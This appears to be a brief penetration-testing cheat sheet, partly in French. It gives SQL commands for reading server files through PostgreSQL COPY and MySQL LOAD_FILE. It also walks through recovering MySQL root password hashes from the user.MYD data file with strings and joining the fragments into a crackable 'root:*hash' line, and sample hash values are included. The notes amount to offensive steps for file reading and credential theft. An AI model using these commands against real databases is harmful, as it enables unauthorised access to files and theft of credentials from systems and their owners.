postgressql file injection
--------------------------
CREATE TABLE demo(t text);
COPY demo from '[FILENAME]';
SELECT * FROM demo;

mysql file injection
--------------------
SELECT LOAD_FILE('/data/test.txt') AS Result;

recup password mysql
--------------------
/bin/false

/var/lib/mysql/mysql/user.MYD (strings) assemble root string + end string

root*8246FACFAA5BB9CFDCDEAEDA
6c732c6044b7
root
    127.0.0.1
root
root
    localhost
debian-sys-maint*7B6D59ECDB7B791CF100CA46D0AD911082112351
15DA4067EAA55FBC
The first part is *8246FACFAA5BB9CFDCDEAEDA and the second part is 15DA4067EAA55FBC (the value should be different on the live instance).

Once you put them together, you should get a file containing:

root:*8246FACFAA5BB9CFDCDEAEDA15DA4067EAA55FBC
